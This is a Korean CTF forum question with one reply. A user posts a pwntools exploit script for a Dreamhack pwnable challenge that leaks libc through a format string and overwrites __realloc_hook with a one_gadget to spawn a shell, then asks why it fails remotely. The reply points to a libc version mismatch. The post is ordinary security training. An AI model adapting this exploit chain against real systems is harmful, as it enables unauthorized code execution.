5 코인
로되리안
from pwn import *
p = process('./link')
#p = remote('host3.dreamhack.games', 22516)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
#context.log_level = 'debug'
libc_start_main_offset = libc.symbols['__libc_start_main']
__realloc_hook_offset = libc.symbols['__realloc_hook']
p.sendafter(': ', '%11$p')
libc_start_main = int(p.recv(14), 16)-231
lb = libc_start_main - libc_start_main_offset
one_gadget = p64(lb + 0xe54f7)
__realloc_hook = lb + __realloc_hook_offset
__realloc_hook_ini = __realloc_hook - 3486840
print(one_gadget)
def add_user(object_n, name, phone, etc):
p.sendlineafter('menu: ', '1')
p.sendlineafter('object number: ', object_n)
p.sendafter('name: ', name)
p.sendafter('phone number: ', phone)
p.sendafter('etc: ', etc)
def edit_user(object_n, new_object_n, game, phone, etc):
p.sendlineafter('menu: ', '4')
p.sendlineafter('object number: ', object_n)
p.sendlineafter('new object number: ', new_object_n)
p.sendafter('new name: ', game)
p.sendafter('new phone number: ', phone)
p.sendafter('new etc: ', etc)
add_user('1','1','1','1')
add_user('2','1','1','1')
edit_user('1', '1', 'A'*0x10, 'A'*0x10, b'A'*0x100+p64(__realloc_hook))
edit_user(str(__realloc_hook_ini),'1', one_gadget,'A','A')
p.sendlineafter('menu: ', '1')
p.interactive()
로컬에선 되는데 리모트에서는 Got EOF while reading in interactive 가 아니라 그냥 파이썬 코드오류로 뜨네요. 뭘고쳐야될까요?
#pwnable
답변
2
redticket
대표 업적 없음
File "link.py", line 39, in <module>
edit_user(str(__realloc_hook_ini),'1', one_gadget,'A','A')
File "link.py", line 30, in edit_user
p.sendlineafter('new object number: ', new_object_n)
File "/usr/local/lib/python3.6/dist-packages/pwnlib/tubes/tube.py", line 822, in sendlineafter
res = self.recvuntil(delim, timeout=timeout)
File "/usr/local/lib/python3.6/dist-packages/pwnlib/tubes/tube.py", line 333, in recvuntil
res = self.recv(timeout=self.timeout)
File "/usr/local/lib/python3.6/dist-packages/pwnlib/tubes/tube.py", line 105, in recv
return self._recv(numb, timeout) or b''
File "/usr/local/lib/python3.6/dist-packages/pwnlib/tubes/tube.py", line 183, in _recv
if not self.buffer and not self._fillbuffer(timeout):
File "/usr/local/lib/python3.6/dist-packages/pwnlib/tubes/tube.py", line 154, in _fillbuffer
data = self.recv_raw(self.buffer.get_fill_size())
File "/usr/local/lib/python3.6/dist-packages/pwnlib/tubes/sock.py", line 56, in recv_raw
raise EOFError
입력받아야할때 못받아서 뜨는 에러같습니다.
이 경우엔 버전아니면 라이브러리가 문제인거 같은데 버전이 18.04가 맞나요?
질문자가 채택한 답변입니다. 좋은 지식을 공유해줘서 고마워요!
wyv3rn
무플 방지 위원회장
:)
질문에 대한 답을 알고 계신가요?
지식을 나누고 포인트를 획득해보세요.
답변하고 포인트 받기 지식을 나누고 포인트를 획득해보세요.
